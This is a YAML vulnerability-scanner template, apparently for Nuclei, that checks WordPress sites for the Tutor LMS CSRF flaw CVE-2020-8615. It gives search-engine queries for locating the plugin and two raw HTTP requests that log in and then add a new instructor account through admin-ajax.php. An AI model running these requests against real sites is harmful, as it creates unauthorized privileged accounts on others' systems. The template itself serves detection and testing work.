63 lines
2.6 KiB
YAML
63 lines
2.6 KiB
YAML
id: CVE-2020-8615
|
|
|
|
info:
|
|
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
|
|
remediation: update to v.1.5.3
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
|
|
- https://wpscan.com/vulnerability/10058
|
|
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
|
|
- https://wpvulndb.com/vulnerabilities/10058
|
|
- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2020-8615
|
|
cwe-id: CWE-352
|
|
epss-score: 0.00867
|
|
epss-percentile: 0.82331
|
|
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: themeum
|
|
product: tutor_lms
|
|
framework: wordpress
|
|
shodan-query: http.html:/wp-content/plugins/tutor/
|
|
fofa-query: body=/wp-content/plugins/tutor/
|
|
publicwww-query: /wp-content/plugins/tutor/
|
|
tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum
|
|
variables:
|
|
user: "{{rand_base(6)}}"
|
|
pass: "{{rand_base(8)}}"
|
|
email: "{{randstr}}@{{rand_base(5)}}.com"
|
|
firstname: "{{rand_base(5)}}"
|
|
lastname: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(content_type_2, "application/json")'
|
|
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
|
|
- 'status_code_2 == 200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100b166c170e0f5e124dfa59d0bf684f25282fd9fd1969e30f06e4a791b03945e29022100a6c6d3bb31891aecbc37d14c7edc9a799013c2041772b04eb43a9192e5bb97d9:922c64590222798bb761d5b6d8e72950 |